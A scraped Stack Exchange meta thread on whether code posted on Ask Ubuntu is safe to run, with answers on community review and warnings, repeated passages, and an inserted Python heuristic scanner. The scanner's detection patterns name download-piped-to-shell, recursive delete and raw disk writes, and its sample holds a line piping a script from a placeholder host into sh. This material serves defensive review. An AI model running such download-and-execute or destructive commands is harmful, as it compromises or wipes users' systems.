
How can we be safe about code from this site that we install?


7 votes

There are a lot of people who code solutions and post them in forums like this one. I think, maybe I'm wrong because I'm a beginner, that these people are able to introduce "evil code". Is some organization taking care of this or is it a user's responsibility?

migrated from askubuntu.com Jun 14 at 21:44

This question came from our site for Ubuntu users and developers.

  • 3
    Read the 'code' first, work out what it will do, and only use it if you agree it will help and understand what it will do. If you're not 100% sure, build a test environment (vm or real-hardware) and test it yourself there.
    – guiverc, Jun 14 at 21:23

  • 3
    If you don't understand how to read the code and the poster has no track record I wouldn't install it. An evil person would design the evil code to explode stuff five months after you tested it in a VM. If it was on this site though the evil person would be banned and evil answer deleted. Chances are someone else would spot the evil code before you see it.
    – WinEunuuchs2Unix, Jun 14 at 21:35

  • 3
    I'd suggest reading this question and answers: If I follow instructions from a blog or Ask Ubuntu, etc, is it always safe?
    – Sergiy Kolodyazhnyy, Jun 17 at 8:20

Tags: discussion, security

asked Jun 14 at 21:21 by VicenteC, edited Jun 19 at 11:14 by Melebius


3 Answers

6 votes

Stack Overflow is far ahead of Ask Ubuntu at reviewing code because it's a programming website. In addition to Stack Overflow's normal way of reviewing code by users who volunteer to be reviewers and by Stack Overflow's moderators, there are also chatrooms that were created specifically for reviewing code and several reviewing bots. Some of these same bots are also reviewing posts every day at Ask Ubuntu. It is possible for users to apply to the bot moderators for permission to participate in reviewing the results of the reviewing bots which flags false positive results and trains the bots to be more accurate. Some bots have the adaptive ability to retract their own results if enough false positives are reported by members of the bot's team.



In the end none of these methods can succeed without the participation of human beings, so there must be oversight by users who volunteer to be reviewers. Anyone can participate in improving the quality of posts at Ask Ubuntu. There is no reputation requirement for submitting a suggested edit to any post to be reviewed by Ask Ubuntu's volunteer reviewers.





answered Jun 14 at 22:25 by karel, edited Jun 14 at 22:33

  • 1
    You mean there are bots that scan posts for code snippets and analyse them for malicious things? I haven't heard of that yet, and tbh I would be surprised if that existed, because it would be terribly complex. Or are you only referring to SmokeDetector and similar?
    – Byte Commander, Jun 14 at 22:54

  • There are bots that scan for plagiarized code. There are also bots that scan for short code snippets that are not accompanied by an explanation of what the code does. However afaik there are not any bots that do deep scanning of code snippets and analyze them for malicious things. As a member of several bot teams I have the privilege of manually reporting my own deep scanning results to the appropriate bot in order to submit it for further review by other reviewers. This is done transparently in a public chatroom and anyone in that chatroom can freely comment about it and frequently does.
    – karel, Jun 14 at 23:04

  • Ah, cool. So I guess this happens in SObotics? That's nice, I'm really not familiar with most of the things people built there.
    – Byte Commander, Jun 14 at 23:11

  • SOBotics and SO Close Vote Reviewers have helped me a lot.
    – karel, Jun 15 at 3:15

  • SO moderators do not review code! No more than any other user, anyway. And, as you say in the comments, there are no bots checking for malicious code, so I don't really understand what you're suggesting.
    – terdon, Jun 16 at 13:27

  • I review low quality posts at Stack Overflow and I always check back on my work to see if the other reviewers at Stack Overflow agree with me. I frequently see that posts that I recommended deletion of were deleted by a Stack Overflow moderator. This is one example of what I meant by Stack Overflow moderators review code. If it's no good they delete the answer. Not just one moderator, several SO moderators do this every day.
    – karel, Jun 16 at 13:42

  • Why don't I explain this more thoroughly in the answer? Because it's not about Ubuntu, therefore off topic. I'm trying to stay on topic in the answer section. If the game runs into extra innings, I can be as off topic as I want to in a topical chatroom without flooding the answer section.
    – karel, Jun 16 at 14:41

5 votes

ANY code that is going to be doing something you do not want will and must have a big fat warning. Most famous one:

Why did the command ":() :;:" make my system lag so badly I had to reboot?

More because guntbert doubts me :-)

Terminal command to remove unknown file

What does rm -rf do?

`rm -rf` and `rm -r` have the same results

I have yet to see an answer where we did not have a warning.

I personally will interpret any code I see in questions. I fix software problems for a living so I have this weird habit that I HAVE to understand code I see, otherwise I keep having this itch. At work I am known for pointing out problems with code where it is not even clear to me I have pointed to a problem. Yes I know I am weird :-X

I know lots of others on AU that review code too. Besides that there are 10, 20 people on AU I trust when they post code on AU and most elaborate answers tend to come from a select few.

  • 1
    You are very confident here - with ANY code - I suggest to s/ANY/Most/.
    – guntbert, Jun 15 at 16:10

  • I reworded it but it has to be "any" ;-)
    – Rinzwind, Jun 15 at 16:20

  • 1
    Those examples are about "obviously" dangerous code - but there may still be cases where someone sticks something malicious between several lines of code/commands. Not every post is thoroughly reviewed. Mind you I don't talk about highly voted answers but according to Murphy's Law we will have malicious code on the site.
    – guntbert, Jun 15 at 19:37

  • "Not every post is thoroughly reviewed." I believe that is not true. Code from new users will be reviewed. People that have shown they can code (like Jacob Vlijm) maybe not as thorough but that's why we trust them ;-)
    – Rinzwind, Jun 15 at 19:47

4 votes

Excellent things have been said already, but let me add a few words from someone who posts those code snippets once in a while.



How can we be safe about code from this site that we install? You can't. Any piece of code could contain harmful - intentionally or not - elements. While that is also true for snippets on AU, you probably won't find a place with less risk than on AU or other SE sites. The reason is that not only snippets are in general relatively short and clear, but more importantly: anyone can (and will) look into the code, and anyone can comment on or flag a post. Any potential critic is visible directly on the post itself.



That is unlike some private websites where we can often see bad advice or inadvisable commands. If I am a crook and want to inject malicious code, the one environment I need to avoid is SE sites.



As said, using code you didn't write yourself is a risk. In short however: in general, I believe the code posted here, especially from answers that already live a bit longer or posted by people who are around a bit longer, is probably the least of your concerns.





  • Also, code that's fine on MY system might break YOUR system, unintentionally.
    – waltinator, Jul 4 at 13:11

– karel
Jun 16 at 13:42






I review low quality posts at Stack Overflow and I always check back on my work to see if the other reviewers at Stack Overflow agree with me. I frequently see that posts that I recommended deletion of were deleted by a Stack Overflow moderator. This is one example of what I meant by Stack Overflow moderators review code. If it's no good they delete the answer. Not just one moderator, several SO moderators do this every day.

– karel
Jun 16 at 13:42














Why don't I explain this more thoroughly in the answer? Because it's not about Ubuntu, therefore off topic. I'm trying to stay on topic in the answer section. If the game runs into extra innings, I can be as off topic as I want to in a topical chatroom without flooding the answer section.

– karel
Jun 16 at 14:41






Why don't I explain this more thoroughly in the answer? Because it's not about Ubuntu, therefore off topic. I'm trying to stay on topic in the answer section. If the game runs into extra innings, I can be as off topic as I want to in a topical chatroom without flooding the answer section.

– karel
Jun 16 at 14:41












5

ANY code that is going to be doing something you do not want will and must have a big fat warning. Most famous one:

Why did the command ":() :;:" make my system lag so badly I had to reboot?

More because guntbert doubts me :-)

Terminal command to remove unknown file

What does rm -rf do?

`rm -rf ` and `rm -r` have the same results

I have yet to see an answer where we did not have a warning.

I personally will interpret any code I see in questions. I fix software problems for a living, so I have this weird habit that I HAVE to understand code I see; otherwise I keep having this itch. At work I am known for pointing out problems with code where it is not even clear to me I have pointed to a problem. Yes, I know I am weird :-X

I know lots of others on AU that review code too. Besides that, there are 10, 20 people on AU I trust when they post code on AU, and most elaborate answers tend to come from a select few.

edited Jun 15 at 19:45

answered Jun 15 at 9:44

Rinzwind

  • You are very confident here - with ANY code - I suggest to s/ANY/Most/.

    – guntbert
    Jun 15 at 16:10

  • I reworded it but it has to be "any" ;-)

    – Rinzwind
    Jun 15 at 16:20

  • Those examples are about "obviously" dangerous code - but there may still be cases where someone sticks something malicious between several lines of code/commands. Not every post is thoroughly reviewed. Mind you I don't talk about highly voted answers but according to Murphy's Law we will have malicious code on the site.

    – guntbert
    Jun 15 at 19:37

  • "Not every post is thoroughly reviewed." I believe that is not true. Code from new users will be reviewed. People that have shown they can code (like Jacob Vlijm) maybe not as thorough but that's why we trust them ;-)

    – Rinzwind
    Jun 15 at 19:47
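
A reader's first pass over a pasted shell snippet, as an added example that is not part of the original thread and not the code of any bot mentioned in it: it joins backslash-continued lines so that a command split across several lines is still seen whole, then reports which lines deserve a manual read. The rule list, the function names and the sample snippet are assumptions constructed for illustration.

```python
import re

# Heuristic rules written for this example; not exhaustive, not any site's official list.
RULES = [
    ("recursive delete",
     re.compile(r"\brm\s+(?:[^\s;&|]+\s+)*?(?:-\w*[rR]\w*|--recursive)\b")),
    ("download piped to a shell",
     re.compile(r"\b(?:curl|wget)\b[^|;]*\|\s*(?:sudo\s+)?(?:ba|z|da)?sh\b")),
    ("decoded or evaluated text",
     re.compile(r"\beval\b|\bbase64\s+(?:-d|--decode)\b")),
    ("raw write to a block device",
     re.compile(r"\bdd\b.*\bof=/dev/")),
    ("world-writable permissions",
     re.compile(r"\bchmod\s+(?:-R\s+)?0?777\b")),
    ("runs as root", re.compile(r"\bsudo\b")),
]

# Constructed sample: a plausible-looking answer with one command split over two lines.
SAMPLE = """\
# reset the sound configuration
sudo apt-get install --reinstall alsa-base
mkdir -p ~/.config/pulse
wget -qO- https://example.invalid/fix.sh \\
  | sh
rm -rf ~/.config/pulse
curl -s https://example.invalid/fix.sh | sha256sum
"""


def logical_lines(snippet):
    """Yield (first_line_number, text), joining backslash continuations and
    dropping comments (naively: quoting is not parsed)."""
    buf, start = "", None
    for number, raw in enumerate(snippet.splitlines(), 1):
        if start is None:
            start = number
        if raw.rstrip().endswith("\\"):
            buf += raw.rstrip()[:-1] + " "
            continue
        text = re.sub(r"(^|\s)#.*$", "", buf + raw).strip()
        if text:
            yield start, text
        buf, start = "", None
    if buf.strip():  # snippet ended in a dangling continuation
        yield start, buf.strip()


def triage(snippet):
    """Return (line_number, rule_name, command) for each rule a command matches."""
    return [(number, name, text)
            for number, text in logical_lines(snippet)
            for name, pattern in RULES
            if pattern.search(text)]


if __name__ == "__main__":
    for number, name, text in triage(SAMPLE):
        print(f"line {number}: {name}: {text}")
```

The rules only recognise commands written in their plain form, so an empty result is not a verdict on the snippet; the output is a reading order for the manual review the answers above describe.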












4

Excellent things have been said already, but let me add a few words from someone who posts those code snippets once in a while.

How can we be safe about code from this site that we install? You can't. Any piece of code could contain harmful - intentionally or not - elements. While that is also true for snippets on AU, you probably won't find a place with less risk than on AU or other SE sites. The reason is not only that snippets are in general relatively short and clear, but more importantly: anyone can (and will) look into the code, and anyone can comment on or flag a post. Any potential critic is visible directly on the post itself.

That is unlike some private websites where we can often see bad advice or inadvisable commands. If I am a crook and want to inject malicious code, the one environment I need to avoid is SE sites.

As said, using code you didn't write yourself is a risk. In short however: in general, I believe the code posted here, especially from answers that already live a bit longer or posted by people who are around a bit longer, is probably the least of your concerns.

edited Jun 20 at 6:56
karel

answered Jun 19 at 18:27
Jacob Vlijm

  • Also, code that's fine on MY system might break YOUR system, unintentionally.

    – waltinator
    Jul 4 at 13:11